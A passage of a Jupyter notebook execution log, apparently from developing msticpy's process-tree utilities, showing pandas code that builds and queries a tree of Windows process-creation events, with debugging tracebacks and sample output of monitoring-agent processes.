"2fb2e9d7-b0cc-4305-a986-934623e11f04", "hasError": true, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "ename": "TypeError", "evalue": "bad operand type for unary ~: 'str'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mTypeError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 2\u001b[0m \u001b[0mproc\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3\u001b[0m \u001b[0msiblings\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mparent\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[0msiblings\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;33m~\u001b[0m\u001b[0msiblings\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mproc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 5\u001b[0m \u001b[1;31m# if not include_source:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 6\u001b[0m \u001b[1;31m# return siblings.loc[~proc]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__invert__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1539\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m__invert__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1540\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1541\u001b[1;33m \u001b[0marr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0moperator\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalues_from_object\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1542\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__array_wrap__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0marr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1543\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'" ] } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings[~siblings.loc[proc.name]]\n# if not include_source:\n# return siblings.loc[~proc]\n# return siblings" }, "executionTime": "2019-12-13T21:12:56.184Z" }, { "cell": { "executionCount": 70, "executionEventId": "443e7ba1-c054-46ce-b1d3-ce39fb94b40e", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:52:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xcd8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/81004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x8dc...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/101004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xbd0...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/151004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.26300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:02:56.263MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xe34...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/671004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.24700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.247MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x53c...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/761004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xef4...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/781004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:22:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xd74...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1071004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x6f8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1201004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1fc0...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1271004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.25300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:12:56.253MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x10bc...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1291004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xb48...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1391004
\n

11 rows × 35 columns

\n
", "text/plain": " TenantId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n\n Account \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \n\n EventID \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \n\n TimeGenerated \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270 \n\n Computer \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \n\n SubjectUserSid \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \n\n SubjectUserName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \n\n SubjectDomainName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \n\n SubjectLogonId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \n\n NewProcessId ... \\\nproc_key ... \nc:\\program files\\microsoft monitoring agent\\age... 0xcd8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x8dc ... \nc:\\program files\\microsoft monitoring agent\\age... 0xbd0 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xe34 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x53c ... \nc:\\program files\\microsoft monitoring agent\\age... 0xef4 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xd74 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x6f8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x1fc0 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x10bc ... \nc:\\program files\\microsoft monitoring agent\\age... 0xb48 ... \n\n source_index_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n ProcessId_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n NewProcessName_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n TimeGenerated_orig_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \n\n parent_key \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \n\n IsRoot IsLeaf IsBranch \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \n\n path parent_index \nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1004/8 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/10 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/15 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/67 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/76 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/78 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/107 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/120 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/127 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/129 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/139 1004 \n\n[11 rows x 35 columns]" }, "execution_count": 70, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings[siblings.index != proc.name]\n# if not include_source:\n# return siblings.loc[~proc]\n# return siblings" }, "executionTime": "2019-12-13T21:13:48.155Z" }, { "cell": { "executionCount": 1, "executionEventId": "6aa53b32-e975-456d-bb18-ffb7e43d2bfd", "hasError": false, "id": "49c5edc4-ca62-4d42-85e3-578a4b9c1872", "outputs": [], "persistentId": "7b5a3079-d2e1-481d-a076-8eaa96f1c430", "text": "import pandas as pd\nimport numpy as np\nprocs = pd.read_pickle(\"../demos/data/processes_on_host.pkl\")" }, "executionTime": "2019-12-13T21:16:59.090Z" }, { "cell": { "executionCount": 2, "executionEventId": "053b9496-9cca-4406-9b43-32a21f338744", "hasError": false, "id": "8fa864ac-34d2-492c-a5f3-8de85bce1ed3", "outputs": [], "persistentId": "23f15d93-9749-4e85-a4ca-a112e158bf76", "text": "testdf = procs.iloc[:1000]\npd.to_pickle(testdf, \"../demos/data/win_proc_test.pkl\")" }, "executionTime": "2019-12-13T21:16:59.137Z" }, { "cell": { "executionCount": 3, "executionEventId": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a", "hasError": false, "id": "70acc446-d177-488d-a4e5-153697303b3a", "outputs": [ { "data": { "text/html": "\nThis product includes GeoLite2 data created by MaxMind, available from\nhttps://www.maxmind.com.\n", "text/plain": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": "\nThis library uses services provided by ipstack.\nhttps://ipstack.com", "text/plain": "" }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n" }, { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "57016d5c03534233a066b16a7fdbc181", "version_major": 2, "version_minor": 0 }, "text/plain": "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))" }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": "{'Processes': 1010, 'RootProcesses': 10, 'LeafProcesses': 815, 'BranchProcesses': 185, 'IsolatedProcesses': 0, 'LargestTreeDepth': 7}\n" } ], "persistentId": "175c1262-ad6d-485c-999b-459cae210ad6", "text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)" }, "executionTime": "2019-12-13T21:17:02.778Z" }, { "cell": { "executionCount": 4, "executionEventId": "ea92c38b-ac05-44b6-96ca-28ff27ba698f", "hasError": true, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "ename": "NameError", "evalue": "name 's_tree' is not defined", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mNameError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 2\u001b[0m \u001b[0mt_root\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_roots\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m4\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3\u001b[0m \u001b[0mfull_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_descendents\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[1;32massert\u001b[0m 